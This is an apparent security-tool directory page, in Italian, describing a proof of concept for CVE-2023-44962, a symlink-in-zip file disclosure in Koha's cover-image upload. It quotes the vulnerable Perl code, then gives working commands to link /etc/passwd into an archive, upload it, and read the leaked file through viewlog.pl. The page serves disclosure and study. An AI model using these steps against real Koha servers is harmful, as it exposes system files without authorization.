Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/ladydarwe/links.a
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebEsfiltrazione DatiConfigurazione Errata
GitHubladydarwe/links.a

Links.a

PoC per CVE-2023-44962

Vedi Repository
12 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-44962

PoC per CVE-2023-44962

Analisi

Il caricamento di file di archivio contenenti link simbolici in upload-cover-image.pl può divulgare parte del contenuto dei file collegati.

root@kitploit:~
...
foreach my $dir (@directories) {
  my $file;
  if ( -e "$dir/idlink.txt" ) {
      $file = "$dir/idlink.txt";
  }
  elsif ( -e "$dir/datalink.txt" ) {
      $file = "$dir/datalink.txt";
  }
  else {
      next;
  }
  if ( open( my $fh, '<', $file ) ) {
      while ( my $line = <$fh> ) {
          my $delim =
              ( $line =~ /\t/ ) ? "\t"
            : ( $line =~ /,/ )  ? ","
            :                     "";

          unless ( $delim eq "," || $delim eq "\t" ) {
              warn
  "Unrecognized or missing field delimeter. Please verify that you are using either a ',' or a 'tab'";
              $error = 'DELERR';
          }
          else {
              ( $biblionumber, $filename ) = split $delim, $line, 2;
              $biblionumber =~
                s/[\"\r\n]//g;    # remove offensive characters
              $filename =~ s/[\"\r\n]//g;
              $filename =~ s/^\s+//;
              $filename =~ s/\s+$//;
              if (C4::Context->preference("CataloguingLog")) {
                  logaction('CATALOGUING', 'MODIFY', $biblionumber, "biblio cover image: $filename");
              }
...

Dal codice si può vedere che quando il file estratto contiene idlink.txt o datalink.txt, il contenuto del file viene letto e diviso secondo , o \t. La parte successiva del contenuto viene assegnata al valore di $filename, e quando l'attributo CataloguingLog è abilitato (abilitato per impostazione predefinita), $filename viene registrato.

Quando si accede a viewlog.pl, è possibile vedere il contenuto del file divulgato.

PoC

Per prima cosa, creare un file di archivio:

root@kitploit:~
ln -s /etc/passwd datalink.txt
zip --symlinks datalink.zip datalink.txt

Quindi accedere al seguente URL per scrivere datalink.zip:

root@kitploit:~
http://koha_ip:intranet_port/cgi-bin/koha/tools/upload-cover-image.pl

Il codice di risposta è 500.

Quindi accedere al seguente URL per leggere il contenuto del file:

root@kitploit:~
http://192.168.176.139:8081/cgi-bin/koha/tools/viewlog.pl
Scarica lo strumento